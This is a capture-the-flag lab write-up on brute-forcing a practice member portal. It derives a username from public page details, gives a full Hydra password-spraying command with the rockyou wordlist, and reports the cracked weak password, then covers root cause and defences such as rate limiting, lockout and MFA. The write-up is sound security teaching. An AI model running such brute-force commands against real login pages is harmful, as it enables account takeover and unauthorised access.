Weak Credentials – Authentication Compromise via Password Brute Force | Halftrack Model Railroad Club
Lab Link
Lab: Halftrack Model Railroad Club
Overview
The Halftrack Model Railroad Club challenge demonstrates an authentication weakness caused by predictable usernames, weak passwords, and missing rate limiting.
The application exposed a member login portal that allowed unlimited authentication attempts. Combined with publicly available user information and poor password choices, this enabled successful credential guessing through brute force.
The vulnerability was not caused by SQL injection or authentication bypass logic. The application simply lacked defensive controls against repeated login attempts.
Objective
Identify a valid username, brute force the password, and gain access to the member portal.
Vulnerability Classification Hierarchy
1
2
3
4
5
OWASP Category
└── A07: Identification and Authentication Failures
└── Weak Authentication Controls
└── Password Brute Force
└── Missing Login Rate Limiting with Weak Credentials
Reconnaissance
The member login portal was available at:
1
https://b2f791cb-4065-combination-8631a.challenges.webverselabs-pro.com/login
A hint on the login page stated:
1
2
Username is firstinitial + lastname
(lowercase, no spaces or dots)
This disclosed the username generation format.
Additional information gathering was performed on:
1
https://b2f791cb-4065-combination-8631a.challenges.webverselabs-pro.com/about
The page identified the club president:
1
Hollis Kerrigan
Using the provided naming convention:
1
h + kerrigan
Generated username:
1
hkerrigan
Exploitation
Since the challenge scenario specifically mentioned:
1
There is no rate limit on the login form
password brute forcing became practical.
Hydra command:
1
2
3
4
hydra -l hkerrigan \
-P /usr/share/wordlists/rockyou.txt \
b2f791cb-4065-combination-8631a.challenges.webverselabs-pro.com \
https-post-form "/login:username=^USER^&password=^PASS^:Incorrect username or password"
Hydra repeatedly attempted passwords from the supplied wordlist.
Successful credentials:
1
hkerrigan : password1
Proof of Exploitation
Using the recovered credentials:
1
2
3
Username: hkerrigan
Password: password1
Access was granted to:
1
https://b2f791cb-4065-combination-8631a.challenges.webverselabs-pro.com/member/dashboard
Dashboard contents exposed:
1
WEBVERSE{.....}
Attack path:
1
2
3
4
5
6
7
8
9
10
11
Public Information
↓
Username Enumeration
↓
Predictable Username Generation
↓
Password Brute Force
↓
Authentication Success
↓
Dashboard Access
Root Cause
The compromise resulted from several issues occurring together:
Predictable username scheme
1
firstinitial + lastname
Weak password selection
1
password1
Missing login protections
No controls existed to detect or slow repeated attempts.
Likely implementation:
1
2
if username_exists:
check_password()
without:
1
2
3
limit_attempts()
lock_account()
monitor_behavior()
Impact
In real-world environments these weaknesses can lead to:
- Account takeover
- Unauthorized portal access
- Credential stuffing success
- Administrative compromise
- Sensitive data exposure
- Internal application access
Brute force attacks frequently succeed against users with weak passwords.
Mitigation
Enforce strong password requirements
Weak:
1
2
3
password1
welcome123
admin123
Stronger examples:
1
Random long passphrases
Implement rate limiting
Example:
1
2
3
5 failed attempts
↓
Temporary lockout
Add account lockouts
Restrict repeated attempts:
1
2
Maximum failed attempts
Cooldown period
Implement MFA
Authentication should include:
1
2
3
Password
+
Additional verification factor
Monitor suspicious activity
Alert on:
1
2
3
Repeated failed logins
High request volume
Credential stuffing patterns
Real-World Insight
Password attacks frequently succeed because attackers combine:
- Public information
- Username patterns
- Common passwords
- Password reuse
- Missing rate limiting
Organizations often assume:
1
Nobody would guess that username
or:
1
Users choose strong passwords
Attackers routinely automate these steps and test thousands of combinations within minutes.